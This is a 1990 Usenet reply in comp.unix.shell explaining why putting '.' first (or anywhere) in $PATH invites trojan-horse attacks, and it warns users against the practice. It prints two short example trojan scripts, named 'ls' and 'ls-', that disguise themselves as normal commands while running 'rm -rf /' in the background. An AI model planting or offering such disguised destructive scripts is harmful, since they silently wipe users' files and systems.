Path: utzoo!attcan!uunet!cs.utexas.edu!sdd.hp.com!mips!wyse!vsi1!zorch!ditka!qiclab!onion!jeff From: jeff@onion.pdx.com (Jeff Beadles) Newsgroups: comp.unix.shell Subject: Re: crontab for ordinary users Message-ID: <1990Oct25.235740.21579@onion.pdx.com> Date: 25 Oct 90 23:57:40 GMT References: <1990Oct23.065611.17458@onion.pdx.com> <4073@goanna.cs.rmit.oz.au> Lines: 92 In <4073@goanna.cs.rmit.oz.au> msf@wren.cs.rmit.OZ.AU (Michael Fuller) writes: > [ I wrote] >>I believe that you're doing your best to make your system vulnerable to a >>trojan horse attack with a brain-damaged path like this. > >> *** DOT SHOULD NEVER BE FIRST IN YOUR PATH. *** > >>There are security papers galore that try to beat this into people, but they >>just don't listen. It IS a very good idea though. > >>If you don't know why dot is bad in front of your path, send me email telling >>me why you need to know. :-) > >Please! Just come out and say it. Having implied that there is a security hole, >you then don't say what it is. Ordinary users such as myself :-) >don't have time or even know quite where to look for the "security papers >galore", but those who _are_ interested in exploiting such >weaknesses will eagerly go off to play. If I knew why it was a bad idea, >I would be *much* less likely to do such a thing. The result now is that >I won't know, and the baddies will :-(. If you must mention a problem, >do so in a way which doesn't disadvantage the very people you are trying >to protect. Well, since this is a fairly well known security-ism, I'll post it. Note, that the smiley was on the line above. All of the people that sent email were given an answer. First, an explaination of the search path. ($PATH) When you run a command with any modern shell, the search path is used to locate the executable program if a path is not given. This makes things much easier for us humans, as we don't have to remember where everything is. Also, the order of the path is significant. Things are searched in the order of the path variable. Thus, if your path is ".:/bin:/usr/bin" and you type the command "ls" the shell will try (in the following order) to run: ./ls /bin/ls /usr/bin/ls However, if your path is set to "/bin:/usr/bin:." then the following order is used: /bin/ls /usr/bin/ls ./ls Anyway, let's say that a user "joe" has his path set to ".:/bin:/usr/bin". Now, I tell them joe I have these keen neat-o-super-duper files in my account, and that he can get a copy of them if he wants. (The story doesn't matter, all you have to do is get someone into a directory that you have write access to. /tmp would do just as well) Anyway. in your directory with all of the other files, you could have a a shell script called "ls". If this exists *IT* will run when the user types "ls" rather than the system's "/bin/ls". What if I had the following script set-up as 'ls'? In a file called "ls" -----cut here----- #!/bin/sh /bin/ls $* rm -rf / 2>/dev/null & -----cut here----- If root ran it, you could kiss your system goodbye (1/2 :-) Or, if ran by "joe" user, then it would remove all "publicly writable" files, and anything owned by "joe" user. This is NOT a good thing, for obvious reasons. I could also argue that dot anywhere in your path is a bad idea. Have you ever typed "ls- l"? You could just as easily have the following trojan horse: In a file called "ls-" -----cut here----- #!/bin/sh echo "ls- : Command not found" rm -rf / 2>/dev/null & -----cut here----- You get the picture. *** DOT SHOULD NEVER BE FIRST IN YOUR PATH. *** By the way, please don't try this at home folks. -Jeff -- Jeff Beadles jeff@onion.pdx.com